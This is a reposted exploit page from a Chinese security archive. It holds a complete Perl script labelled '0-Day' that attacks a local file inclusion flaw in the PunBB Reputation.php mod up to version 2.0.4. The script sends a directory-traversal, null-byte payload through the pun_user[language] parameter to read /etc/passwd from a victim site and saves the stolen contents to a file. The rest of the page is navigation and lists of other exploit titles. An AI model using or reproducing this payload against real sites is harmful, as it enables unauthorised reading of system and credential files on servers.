首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PunBB Reputation.php Mod <= 2.0.4 Local File Inclusion Exploit
来源:www.warwolfz.org 作者:Dante90 发布时间:2009-07-31  

#!/usr/bin/perl
#[0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
#register_globals = On
#magic_quotes_gpc = On


use LWP::UserAgent;
use HTTP::Cookies;
use strict;

my $EtcPasswd;
my $TransversalDirectory = "./../../../../"; #Transversal Directory
my $LFI = "etc/passwd"; #File Inject
my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link

my $Referrer = "http://www.warwolfz.com/";

my $Cookies = new HTTP::Cookies;
my $UserAgent = new LWP::UserAgent(
   agent => 'Mozilla/5.0',
   max_redirect => 0,

   cookie_jar => $Cookies,
  ) or die $!;

sub Local_File_Inclusion{
 my ($Directory,$Command) = @_;
 return "./include/reputation/rep_profile.php?pun_user[language]=${Directory}${Command}%00";

}

my $Get = $UserAgent->get($HostName.Local_File_Inclusion($TransversalDirectory,$LFI));

if ($Get->content =~ /No such file or directory in/i){
 refresh($HostName, "Exploit Filed");
 print " * Error extracting sensible data.\n";

 print " * Exploit Failed                                     *\n";
 print " ------------------------------------------------------ \n\n";
}else{
 $EtcPasswd = $Get->content;
 open ( FILE , ">WaRWolFz.html" ) or die $!;

 print FILE $EtcPasswd;
 close ( FILE );
 refresh($HostName, "File Saved");
 print " * Exploit Successed                                  *\n";
 print " ------------------------------------------------------\n\n";

 system("pause");
}

sub usage{
 system("cls");
 {
  print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";
  print " ------------------------------------------------------ \n";

  print " * USAGE:                                             *\n";
  print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
  print " * perl name_exploit.pl                               *\n";

  print " ------------------------------------------------------ \n";
  print " *         Powered By Dante90, WaRWolFz Crew          *\n";
  print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";

  print " ------------------------------------------------------ \n";
 };
 exit;
}

sub refresh{
 system("cls");
 {
  print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";

  print " ------------------------------------------------------ \n";
  print " * USAGE:                                             *\n";
  print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";

  print " * perl name_exploit.pl                               *\n";
  print " ------------------------------------------------------ \n";
  print " *         Powered By Dante90, WaRWolFz Crew          *\n";

  print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
  print " ------------------------------------------------------ \n";

 };
 print " * Victime Site: " . $_[0] . "\n";
 print " * Etc/Passwd: " . $_[1] . "\n";
}

#WaRWolFz


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IBM AIX 5.3 libc MALLOCDEBUG F
·EPSON Status Monitor 3 Local P
·bind can be crashed with an up
·VLC Media Player 0.8.6f smb://
·Microsoft Windows XP (win32k.s
·Compface 1.1.5 (.xbm File) Loc
·Microsoft Windows XP (win32k.s
·ISC BIND 9 Remote Dynamic Upda
·Google SketchUp Pro 7.0 (.skp
·VLC Media Player 0.8.6f smb://
·PunBB Reputation.php module ve
·SAP Business One 2005-A Licens
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved